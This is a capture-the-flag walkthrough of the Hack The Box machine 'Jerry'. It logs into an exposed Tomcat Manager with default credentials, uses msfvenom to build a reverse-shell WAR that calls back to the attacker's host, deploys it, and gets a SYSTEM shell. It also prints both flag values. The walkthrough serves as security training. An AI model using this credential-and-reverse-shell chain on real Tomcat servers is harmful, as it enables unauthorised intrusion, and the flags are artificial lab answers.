Jerry

Windows box on HTB.

Enumeration:

Port Scanning:

Nmap:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Jerry]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.136.9            
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-18 12:46 +03
Nmap scan report for 10.129.136.9
Host is up, received echo-reply ttl 127 (0.14s latency).
Scanned at 2025-09-18 12:46:24 +03 for 139s
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE REASON          VERSION
8080/tcp open  http    syn-ack ttl 127 Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88

Only one port answers: Apache Tomcat 7.0.88 on 8080. The other 65534 ports are filtered (no response at all), so the host drops everything else at the firewall and Tomcat is the whole attack surface.

Open it with Firefox:

The default Tomcat landing page confirms the version, 7.0.88. That is an old release with multiple public exploits, but on Tomcat the quickest check is always the Manager application: if it is exposed with default or weak credentials, no memory-corruption exploit is needed.

Exploitation:

Get a reverse shell:

Click on "Manager App":

It prompts for a username and password (HTTP Basic authentication):

We can try common default combinations, like admin:admin:

That returns an Access Denied page, but the stock Tomcat error page helpfully includes an example tomcat-users.xml entry with the credentials tomcat:s3cret, and on this box that example was never changed:

Let's test them:

We successfully managed to authenticate.

The Manager lets us deploy a WAR file, and any JSP inside it runs under the Tomcat service account, so we can deploy a JSP web shell or a WAR carrying a reverse shell. First, create the WAR with msfvenom (LPORT=443 because outbound 443 is the port least likely to be blocked by egress filtering):

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Jerry]                                   
└─$ msfvenom -p java/shell_reverse_tcp LHOST=10.10.16.16 LPORT=443 -f war -o shell.war                                                                                      
Payload size: 13030 bytes                  
Final size of war file: 13030 bytes                                                   
Saved as: shell.war

Scroll down to the "WAR file to deploy" section (Select WAR file to upload):

I will press browse, and upload the shell.war that I created:

Click Deploy, and the new context /shell appears in the applications table:

Start our netcat listener:

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Jerry]                                   
└─$ rlwrap nc -nlvp 443                    
listening on [any] 443 ...

Then click the /shell entry in the applications table, or navigate to IP:PORT/shell/ (the WAR's name becomes its context path):

The page is blank, but back on the listener the shell has arrived:

connect to [10.10.16.16] from (UNKNOWN) [10.129.136.9] 49198                          
Microsoft Windows [Version 6.3.9600]       
(c) 2013 Microsoft Corporation. All rights reserved.                                  
                                           
C:\apache-tomcat-7.0.88>whoami
nt authority\system

C:\apache-tomcat-7.0.88>hostname
JERRY

C:\apache-tomcat-7.0.88>ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::19c5:d18d:c40a:d5cd
   Link-local IPv6 Address . . . . . : fe80::19c5:d18d:c40a:d5cd%12
   IPv4 Address. . . . . . . . . . . : 10.129.136.9
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%12
                                       10.129.0.1

Tunnel adapter isatap..htb:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb

Tomcat runs as NT AUTHORITY\SYSTEM here, so there is no privilege-escalation step; both flags sit in a single file on the Administrator desktop:

C:\apache-tomcat-7.0.88>type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
